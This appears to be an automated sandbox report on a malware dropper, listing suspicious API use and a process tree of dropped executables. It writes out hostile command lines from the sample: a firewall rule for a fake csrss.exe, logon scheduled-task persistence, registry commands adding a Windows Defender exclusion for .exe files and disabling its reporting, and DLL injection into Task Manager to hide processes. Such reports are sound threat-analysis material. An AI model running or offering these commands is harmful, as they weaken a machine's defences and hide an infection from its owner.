Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2791 = "Novosibirsk Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-402 = "Arabic Standard Time"	Info.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

jfiag3g_gg.exeWerFault.exepub2.exeInfo.exe

pid	process
4528	jfiag3g_gg.exe
4528	jfiag3g_gg.exe
2800	WerFault.exe
2800	WerFault.exe
2428	pub2.exe
2428	pub2.exe
2216
2216
2216
2216
2216
2216
2216
2216
2216
2216
2216
2216
2216
2216
2216
2216
2216
2216
2216
2216
4092	Info.exe
4092	Info.exe
2216
2216
2216
2216
2216
2216
2216
2216
2216
2216
2216
2216
2216
2216
2216
2216
2216
2216
2216
2216
2216
2216
2216
2216
2216
2216
2216
2216
2216
2216
2216
2216
2216
2216
2216
2216

Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

pub2.exe

pid process

2428 pub2.exe

pid	process
2428	pub2.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

SoCleanInst.exeInstall.exetaskkill.exeWerFault.exemd9_1sjm.exesvchost.exeUpdbdate.exeInfo.exesvchost.exe

description	pid	process
Token: SeDebugPrivilege	2104	SoCleanInst.exe
Token: SeCreateTokenPrivilege	4152	Install.exe
Token: SeAssignPrimaryTokenPrivilege	4152	Install.exe
Token: SeLockMemoryPrivilege	4152	Install.exe
Token: SeIncreaseQuotaPrivilege	4152	Install.exe
Token: SeMachineAccountPrivilege	4152	Install.exe
Token: SeTcbPrivilege	4152	Install.exe
Token: SeSecurityPrivilege	4152	Install.exe
Token: SeTakeOwnershipPrivilege	4152	Install.exe
Token: SeLoadDriverPrivilege	4152	Install.exe
Token: SeSystemProfilePrivilege	4152	Install.exe
Token: SeSystemtimePrivilege	4152	Install.exe
Token: SeProfSingleProcessPrivilege	4152	Install.exe
Token: SeIncBasePriorityPrivilege	4152	Install.exe
Token: SeCreatePagefilePrivilege	4152	Install.exe
Token: SeCreatePermanentPrivilege	4152	Install.exe
Token: SeBackupPrivilege	4152	Install.exe
Token: SeRestorePrivilege	4152	Install.exe
Token: SeShutdownPrivilege	4152	Install.exe
Token: SeDebugPrivilege	4152	Install.exe
Token: SeAuditPrivilege	4152	Install.exe
Token: SeSystemEnvironmentPrivilege	4152	Install.exe
Token: SeChangeNotifyPrivilege	4152	Install.exe
Token: SeRemoteShutdownPrivilege	4152	Install.exe
Token: SeUndockPrivilege	4152	Install.exe
Token: SeSyncAgentPrivilege	4152	Install.exe
Token: SeEnableDelegationPrivilege	4152	Install.exe
Token: SeManageVolumePrivilege	4152	Install.exe
Token: SeImpersonatePrivilege	4152	Install.exe
Token: SeCreateGlobalPrivilege	4152	Install.exe
Token: 31	4152	Install.exe
Token: 32	4152	Install.exe
Token: 33	4152	Install.exe
Token: 34	4152	Install.exe
Token: 35	4152	Install.exe
Token: SeDebugPrivilege	640	taskkill.exe
Token: SeRestorePrivilege	2800	WerFault.exe
Token: SeBackupPrivilege	2800	WerFault.exe
Token: SeBackupPrivilege	2800	WerFault.exe
Token: SeManageVolumePrivilege	4488	md9_1sjm.exe
Token: SeShutdownPrivilege	636	svchost.exe
Token: SeCreatePagefilePrivilege	636	svchost.exe
Token: SeShutdownPrivilege	636	svchost.exe
Token: SeCreatePagefilePrivilege	636	svchost.exe
Token: SeShutdownPrivilege	636	svchost.exe
Token: SeCreatePagefilePrivilege	636	svchost.exe
Token: SeDebugPrivilege	4992	Updbdate.exe
Token: SeManageVolumePrivilege	4488	md9_1sjm.exe
Token: SeShutdownPrivilege	2216
Token: SeCreatePagefilePrivilege	2216
Token: SeShutdownPrivilege	2216
Token: SeCreatePagefilePrivilege	2216
Token: SeShutdownPrivilege	2216
Token: SeCreatePagefilePrivilege	2216
Token: SeShutdownPrivilege	2216
Token: SeCreatePagefilePrivilege	2216
Token: SeDebugPrivilege	4092	Info.exe
Token: SeImpersonatePrivilege	4092	Info.exe
Token: SeTcbPrivilege	2520	svchost.exe
Token: SeTcbPrivilege	2520	svchost.exe
Token: SeManageVolumePrivilege	4488	md9_1sjm.exe
Token: SeShutdownPrivilege	2216
Token: SeCreatePagefilePrivilege	2216
Token: SeManageVolumePrivilege	4488	md9_1sjm.exe

Suspicious use of SetWindowsHookEx 5 IoCs

Processes:

vMHbrGep8o912dpUI3tqXY9A.exe0r9BWtY4OEsfmZoQDEKwGHro.exeWerFault.exe2Tv8_mPSi_59ygUFTQlgG9ca.exeHsPs0gIrdTB71ZVvAReV9Qj4.exe

pid	process
1180	vMHbrGep8o912dpUI3tqXY9A.exe
1616	0r9BWtY4OEsfmZoQDEKwGHro.exe
4868	WerFault.exe
3632	2Tv8_mPSi_59ygUFTQlgG9ca.exe
2064	HsPs0gIrdTB71ZVvAReV9Qj4.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

32a3a7a61634267009230564c139e3a42ec69175d0d7a764f31e54aa6013bfe3.exeFolder.exeFiles.exeInstall.execmd.exerUNdlL32.eXeWerFault.exesvchost.exeInfo.execmd.exenew23.exe

description	pid	process	target process
PID 1408 wrote to memory of 4488	1408	32a3a7a61634267009230564c139e3a42ec69175d0d7a764f31e54aa6013bfe3.exe	md9_1sjm.exe
PID 1408 wrote to memory of 4488	1408	32a3a7a61634267009230564c139e3a42ec69175d0d7a764f31e54aa6013bfe3.exe	md9_1sjm.exe
PID 1408 wrote to memory of 4488	1408	32a3a7a61634267009230564c139e3a42ec69175d0d7a764f31e54aa6013bfe3.exe	md9_1sjm.exe
PID 1408 wrote to memory of 2104	1408	32a3a7a61634267009230564c139e3a42ec69175d0d7a764f31e54aa6013bfe3.exe	SoCleanInst.exe
PID 1408 wrote to memory of 2104	1408	32a3a7a61634267009230564c139e3a42ec69175d0d7a764f31e54aa6013bfe3.exe	SoCleanInst.exe
PID 1408 wrote to memory of 4344	1408	32a3a7a61634267009230564c139e3a42ec69175d0d7a764f31e54aa6013bfe3.exe	Folder.exe
PID 1408 wrote to memory of 4344	1408	32a3a7a61634267009230564c139e3a42ec69175d0d7a764f31e54aa6013bfe3.exe	Folder.exe
PID 1408 wrote to memory of 4344	1408	32a3a7a61634267009230564c139e3a42ec69175d0d7a764f31e54aa6013bfe3.exe	Folder.exe
PID 1408 wrote to memory of 4092	1408	32a3a7a61634267009230564c139e3a42ec69175d0d7a764f31e54aa6013bfe3.exe	Info.exe
PID 1408 wrote to memory of 4092	1408	32a3a7a61634267009230564c139e3a42ec69175d0d7a764f31e54aa6013bfe3.exe	Info.exe
PID 1408 wrote to memory of 4092	1408	32a3a7a61634267009230564c139e3a42ec69175d0d7a764f31e54aa6013bfe3.exe	Info.exe
PID 1408 wrote to memory of 4992	1408	32a3a7a61634267009230564c139e3a42ec69175d0d7a764f31e54aa6013bfe3.exe	Updbdate.exe
PID 1408 wrote to memory of 4992	1408	32a3a7a61634267009230564c139e3a42ec69175d0d7a764f31e54aa6013bfe3.exe	Updbdate.exe
PID 1408 wrote to memory of 4992	1408	32a3a7a61634267009230564c139e3a42ec69175d0d7a764f31e54aa6013bfe3.exe	Updbdate.exe
PID 1408 wrote to memory of 4316	1408	32a3a7a61634267009230564c139e3a42ec69175d0d7a764f31e54aa6013bfe3.exe	new23.exe
PID 1408 wrote to memory of 4316	1408	32a3a7a61634267009230564c139e3a42ec69175d0d7a764f31e54aa6013bfe3.exe	new23.exe
PID 1408 wrote to memory of 4316	1408	32a3a7a61634267009230564c139e3a42ec69175d0d7a764f31e54aa6013bfe3.exe	new23.exe
PID 1408 wrote to memory of 2648	1408	32a3a7a61634267009230564c139e3a42ec69175d0d7a764f31e54aa6013bfe3.exe	File.exe
PID 1408 wrote to memory of 2648	1408	32a3a7a61634267009230564c139e3a42ec69175d0d7a764f31e54aa6013bfe3.exe	File.exe
PID 1408 wrote to memory of 2648	1408	32a3a7a61634267009230564c139e3a42ec69175d0d7a764f31e54aa6013bfe3.exe	File.exe
PID 1408 wrote to memory of 4152	1408	32a3a7a61634267009230564c139e3a42ec69175d0d7a764f31e54aa6013bfe3.exe	Install.exe
PID 1408 wrote to memory of 4152	1408	32a3a7a61634267009230564c139e3a42ec69175d0d7a764f31e54aa6013bfe3.exe	Install.exe
PID 1408 wrote to memory of 4152	1408	32a3a7a61634267009230564c139e3a42ec69175d0d7a764f31e54aa6013bfe3.exe	Install.exe
PID 1408 wrote to memory of 2428	1408	32a3a7a61634267009230564c139e3a42ec69175d0d7a764f31e54aa6013bfe3.exe	pub2.exe
PID 1408 wrote to memory of 2428	1408	32a3a7a61634267009230564c139e3a42ec69175d0d7a764f31e54aa6013bfe3.exe	pub2.exe
PID 1408 wrote to memory of 2428	1408	32a3a7a61634267009230564c139e3a42ec69175d0d7a764f31e54aa6013bfe3.exe	pub2.exe
PID 1408 wrote to memory of 1852	1408	32a3a7a61634267009230564c139e3a42ec69175d0d7a764f31e54aa6013bfe3.exe	Files.exe
PID 1408 wrote to memory of 1852	1408	32a3a7a61634267009230564c139e3a42ec69175d0d7a764f31e54aa6013bfe3.exe	Files.exe
PID 1408 wrote to memory of 1852	1408	32a3a7a61634267009230564c139e3a42ec69175d0d7a764f31e54aa6013bfe3.exe	Files.exe
PID 4344 wrote to memory of 2404	4344	Folder.exe	Folder.exe
PID 4344 wrote to memory of 2404	4344	Folder.exe	Folder.exe
PID 4344 wrote to memory of 2404	4344	Folder.exe	Folder.exe
PID 1852 wrote to memory of 2264	1852	Files.exe	WerFault.exe
PID 1852 wrote to memory of 2264	1852	Files.exe	WerFault.exe
PID 1852 wrote to memory of 2264	1852	Files.exe	WerFault.exe
PID 4152 wrote to memory of 3884	4152	Install.exe	cmd.exe
PID 4152 wrote to memory of 3884	4152	Install.exe	cmd.exe
PID 4152 wrote to memory of 3884	4152	Install.exe	cmd.exe
PID 3884 wrote to memory of 640	3884	cmd.exe	taskkill.exe
PID 3884 wrote to memory of 640	3884	cmd.exe	taskkill.exe
PID 3884 wrote to memory of 640	3884	cmd.exe	taskkill.exe
PID 2968 wrote to memory of 2236	2968	rUNdlL32.eXe	rundll32.exe
PID 2968 wrote to memory of 2236	2968	rUNdlL32.eXe	rundll32.exe
PID 2968 wrote to memory of 2236	2968	rUNdlL32.eXe	rundll32.exe
PID 2520 wrote to memory of 2236	2520	WerFault.exe	rundll32.exe
PID 2520 wrote to memory of 2236	2520	WerFault.exe	rundll32.exe
PID 1852 wrote to memory of 4528	1852	Files.exe	jfiag3g_gg.exe
PID 1852 wrote to memory of 4528	1852	Files.exe	jfiag3g_gg.exe
PID 1852 wrote to memory of 4528	1852	Files.exe	jfiag3g_gg.exe
PID 2520 wrote to memory of 4540	2520	svchost.exe	Info.exe
PID 2520 wrote to memory of 4540	2520	svchost.exe	Info.exe
PID 2520 wrote to memory of 4540	2520	svchost.exe	Info.exe
PID 4540 wrote to memory of 4344	4540	Info.exe	cmd.exe
PID 4540 wrote to memory of 4344	4540	Info.exe	cmd.exe
PID 4344 wrote to memory of 964	4344	cmd.exe	netsh.exe
PID 4344 wrote to memory of 964	4344	cmd.exe	netsh.exe
PID 4540 wrote to memory of 4916	4540	Info.exe	csrss.exe
PID 4540 wrote to memory of 4916	4540	Info.exe	csrss.exe
PID 4540 wrote to memory of 4916	4540	Info.exe	csrss.exe
PID 2520 wrote to memory of 3588	2520	svchost.exe	schtasks.exe
PID 2520 wrote to memory of 3588	2520	svchost.exe	schtasks.exe
PID 4316 wrote to memory of 3504	4316	new23.exe	new23.exe
PID 4316 wrote to memory of 3504	4316	new23.exe	new23.exe
PID 4316 wrote to memory of 3504	4316	new23.exe	new23.exe

C:\Users\Admin\AppData\Local\Temp\32a3a7a61634267009230564c139e3a42ec69175d0d7a764f31e54aa6013bfe3.exe
"C:\Users\Admin\AppData\Local\Temp\32a3a7a61634267009230564c139e3a42ec69175d0d7a764f31e54aa6013bfe3.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1408

C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe
"C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe"
2⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of AdjustPrivilegeToken
PID:4488

C:\Users\Admin\AppData\Local\Temp\SoCleanInst.exe
"C:\Users\Admin\AppData\Local\Temp\SoCleanInst.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2104

C:\Users\Admin\AppData\Local\Temp\Folder.exe
"C:\Users\Admin\AppData\Local\Temp\Folder.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4344

C:\Users\Admin\AppData\Local\Temp\Folder.exe
"C:\Users\Admin\AppData\Local\Temp\Folder.exe" -a
3⤵
- Executes dropped EXE
PID:2404

C:\Users\Admin\AppData\Local\Temp\Info.exe
"C:\Users\Admin\AppData\Local\Temp\Info.exe"
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4092

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4092 -s 368
3⤵
- Program crash
PID:3444

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4092 -s 372
3⤵
- Program crash
PID:3800

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4092 -s 380
3⤵
- Program crash
PID:4332

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4092 -s 652
3⤵
- Program crash
PID:1396

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4092 -s 652
3⤵
- Program crash
PID:1180

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4092 -s 652
3⤵
- Program crash
PID:3740

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4092 -s 652
3⤵
- Program crash
PID:4220

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4092 -s 736
3⤵
- Executes dropped EXE
- Program crash
PID:2264

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4092 -s 752
3⤵
- Program crash
PID:2076

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4092 -s 604
3⤵
- Program crash
PID:4872

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4092 -s 828
3⤵
- Program crash
PID:3140

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4092 -s 764
3⤵
- Program crash
PID:1976

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4092 -s 708
3⤵
- Program crash
PID:3252

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4092 -s 944
3⤵
- Program crash
PID:2944

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4092 -s 960
3⤵
- Program crash
PID:4952

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4092 -s 892
3⤵
- Program crash
PID:4428

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4092 -s 604
3⤵
- Program crash
PID:4324

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4092 -s 908
3⤵
- Program crash
PID:2104

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4092 -s 752
3⤵
- Program crash
PID:2076

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4092 -s 892
3⤵
- Program crash
PID:4872

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4092 -s 700
3⤵
- Program crash
PID:2456

C:\Users\Admin\AppData\Local\Temp\Info.exe
"C:\Users\Admin\AppData\Local\Temp\Info.exe"
3⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious use of WriteProcessMemory
PID:4540

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4540 -s 332
4⤵
- Program crash
PID:1656

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4540 -s 336
4⤵
- Program crash
PID:4328

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4540 -s 336
4⤵
- Program crash
PID:3620

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4540 -s 624
4⤵
- Program crash
PID:3948

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4540 -s 624
4⤵
- Program crash
PID:1520

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4540 -s 624
4⤵
- Program crash
PID:1232

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4540 -s 700
4⤵
- Program crash
PID:1856

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4540 -s 704
4⤵
- Program crash
PID:736

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4540 -s 720
4⤵
- Program crash
PID:3712

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4540 -s 580
4⤵
- Program crash
PID:4152

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4540 -s 664
4⤵
- Program crash
PID:5044

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4540 -s 896
4⤵
- Program crash
PID:1224

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4540 -s 780
4⤵
- Program crash
PID:2976

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4540 -s 872
4⤵
- Program crash
PID:1660

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4540 -s 912
4⤵
- Program crash
PID:1736

C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
4⤵
- Suspicious use of WriteProcessMemory
PID:4344

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
5⤵
PID:964

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4540 -s 908
4⤵
- Program crash
PID:4356

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4540 -s 908
4⤵
- Program crash
PID:4700

C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe /94-94
4⤵
- Executes dropped EXE
PID:4916

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4916 -s 368
5⤵
- Program crash
PID:1460

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4916 -s 376
5⤵
- Program crash
PID:4044

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4916 -s 376
5⤵
- Program crash
PID:4760

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4916 -s 664
5⤵
- Program crash
PID:4492

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4916 -s 664
5⤵
- Program crash
PID:4884

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4916 -s 664
5⤵
- Program crash
PID:1856

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4916 -s 728
5⤵
- Program crash
PID:3004

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4916 -s 740
5⤵
- Program crash
PID:3304

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4916 -s 756
5⤵
- Program crash
PID:1028

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4916 -s 644
5⤵
- Program crash
PID:3424

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4916 -s 664
5⤵
- Program crash
PID:3260

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4916 -s 724
5⤵
- Program crash
PID:4648

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4916 -s 724
5⤵
- Program crash
PID:1608

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4916 -s 900
5⤵
- Program crash
PID:2664

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4916 -s 900
5⤵
- Program crash
PID:4300

C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
5⤵
- Creates scheduled task(s)
PID:3588

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4916 -s 976
5⤵
- Program crash
PID:3140

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4916 -s 992
5⤵
- Program crash
PID:1236

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4916 -s 1032
5⤵
- Program crash
PID:4892

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4916 -s 980
5⤵
- Program crash
PID:1436

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4916 -s 980
5⤵
- Program crash
PID:3004

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4916 -s 932
5⤵
- Program crash
PID:5088

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4916 -s 1092
5⤵
- Program crash
PID:4036

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4916 -s 1112
5⤵
- Program crash
PID:2204

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4916 -s 1080
5⤵
- Program crash
PID:3060

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
5⤵
PID:4688

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
5⤵
PID:3004

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
5⤵
PID:4764

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4916 -s 1152
5⤵
- Program crash
PID:3952

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4916 -s 1140
5⤵
PID:3624

C:\Users\Admin\AppData\Local\Temp\Updbdate.exe
"C:\Users\Admin\AppData\Local\Temp\Updbdate.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4992

C:\Users\Admin\AppData\Local\Temp\new23.exe
"C:\Users\Admin\AppData\Local\Temp\new23.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4316

C:\Users\Admin\AppData\Local\Temp\new23.exe
"C:\Users\Admin\AppData\Local\Temp\new23.exe"
3⤵
- Executes dropped EXE
PID:3504

C:\Users\Admin\AppData\Local\Temp\File.exe
"C:\Users\Admin\AppData\Local\Temp\File.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
PID:2648

C:\Users\Admin\Pictures\Adobe Films\tqjOegMU3jScEUlDNgEDG8oK.exe
"C:\Users\Admin\Pictures\Adobe Films\tqjOegMU3jScEUlDNgEDG8oK.exe"
3⤵
- Executes dropped EXE
PID:3528

C:\Users\Admin\Pictures\Adobe Films\vMHbrGep8o912dpUI3tqXY9A.exe
"C:\Users\Admin\Pictures\Adobe Films\vMHbrGep8o912dpUI3tqXY9A.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1180

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
4⤵
- Creates scheduled task(s)
PID:5204

C:\Users\Admin\Documents\AZkVGSBmqpJBOHKOlOqUVd1b.exe
"C:\Users\Admin\Documents\AZkVGSBmqpJBOHKOlOqUVd1b.exe"
4⤵
PID:5196

C:\Users\Admin\Pictures\Adobe Films\KlSXlWQjktiCKdX8Zel6htXA.exe
"C:\Users\Admin\Pictures\Adobe Films\KlSXlWQjktiCKdX8Zel6htXA.exe"
5⤵
PID:5840

C:\Users\Admin\Pictures\Adobe Films\bEKE292eAjHWReQUpvCOmimh.exe
"C:\Users\Admin\Pictures\Adobe Films\bEKE292eAjHWReQUpvCOmimh.exe"
5⤵
PID:3016

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3016 -s 288
6⤵
PID:1276

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3016 -s 624
6⤵
PID:5568

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3016 -s 652
6⤵
PID:860

C:\Users\Admin\Pictures\Adobe Films\LEKZQ8BcneBcEVPort9LXUUy.exe
"C:\Users\Admin\Pictures\Adobe Films\LEKZQ8BcneBcEVPort9LXUUy.exe"
5⤵
PID:3368

C:\Windows\SysWOW64\control.exe
"C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\PDSIHzLf.cPl",
6⤵
PID:5128

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\PDSIHzLf.cPl",
7⤵
PID:5956

C:\Users\Admin\Pictures\Adobe Films\ibbXxGOsEWznrNMcprg3RW_v.exe
"C:\Users\Admin\Pictures\Adobe Films\ibbXxGOsEWznrNMcprg3RW_v.exe"
5⤵
PID:564

C:\Users\Admin\AppData\Local\Temp\7zSBA7F.tmp\Install.exe
.\Install.exe
6⤵
PID:3948

C:\Users\Admin\AppData\Local\Temp\7zS4E5.tmp\Install.exe
.\Install.exe /S /site_id "525403"
7⤵
PID:5884

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
8⤵
PID:6136

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
8⤵
PID:5416

C:\Users\Admin\Pictures\Adobe Films\9eQkypiA_pCrOEO94N92LYMF.exe
"C:\Users\Admin\Pictures\Adobe Films\9eQkypiA_pCrOEO94N92LYMF.exe"
5⤵
PID:6052

C:\Users\Admin\AppData\Local\Temp\TrdngAnlzr95662.exe
"C:\Users\Admin\AppData\Local\Temp\TrdngAnlzr95662.exe"
6⤵
PID:5368

C:\Users\Admin\AppData\Local\Temp\6GG4L.exe
"C:\Users\Admin\AppData\Local\Temp\6GG4L.exe"
7⤵
PID:5084

C:\Users\Admin\AppData\Local\Temp\6GG4L.exe
"C:\Users\Admin\AppData\Local\Temp\6GG4L.exe"
7⤵
PID:6068

C:\Users\Admin\AppData\Local\Temp\6GG4L.exe
"C:\Users\Admin\AppData\Local\Temp\6GG4L.exe"
7⤵
PID:4852

C:\Users\Admin\AppData\Local\Temp\6GG4L.exe
"C:\Users\Admin\AppData\Local\Temp\6GG4L.exe"
7⤵
PID:1220

